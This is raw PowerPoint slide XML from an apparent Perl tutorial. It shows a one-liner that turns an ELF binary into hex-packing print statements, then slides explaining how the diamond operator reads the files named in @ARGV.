            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>$/=\32;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print \$FH pack q/H*/, q/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unpack"H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\ or die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$!/;\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfbinary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>may generate the following lines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $FH pack q/H*/, q/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7f454c4602010100000000000000000002003e0001000000304f450000000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Explanation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="手繪多邊形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798560" y="3007360"/>
            <a:ext cx="10160" cy="1178560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10160"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1178560"/>
              <a:gd name="connsiteX1" fmla="*/ 10160 w 10160"/>
              <a:gd name="connsiteY1" fmla="*/ 1178560 h 1178560"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10160" h="1178560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3387" y="392853"/>
                  <a:pt x="6773" y="785707"/>
                  <a:pt x="10160" y="1178560"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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手繪多邊形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40640" y="2357120"/>
            <a:ext cx="4785360" cy="1869440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4785360 w 4785360"/>
              <a:gd name="connsiteY0" fmla="*/ 314960 h 1869440"/>
              <a:gd name="connsiteX1" fmla="*/ 4785360 w 4785360"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1869440"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4785360"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1869440"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4785360"/>
              <a:gd name="connsiteY3" fmla="*/ 1524000 h 1869440"/>
              <a:gd name="connsiteX4" fmla="*/ 975360 w 4785360"/>
              <a:gd name="connsiteY4" fmla="*/ 1524000 h 1869440"/>
              <a:gd name="connsiteX5" fmla="*/ 975360 w 4785360"/>
              <a:gd name="connsiteY5" fmla="*/ 1869440 h 1869440"/>
              <a:gd name="connsiteX6" fmla="*/ 965200 w 4785360"/>
              <a:gd name="connsiteY6" fmla="*/ 1869440 h 186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5360" h="1869440">
                <a:moveTo>
                  <a:pt x="4785360" y="314960"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4785360" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1524000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="975360" y="1524000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="975360" y="1869440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965200" y="1869440"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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4997860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5" y="2636912"/>
            <a:ext cx="8928991" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The Diamond operator is almost exclusively used in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-loop. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It allows us to iterate over the rows in all the files given on the command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> reaches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> the first time it looks at the content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that, by default, contains the values passed on the command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Diamond Operator (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Gabor Szabo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23445221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786616"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>shifts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> the first element to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> scalar variable, opens the file that has its name in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and reads in the first line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
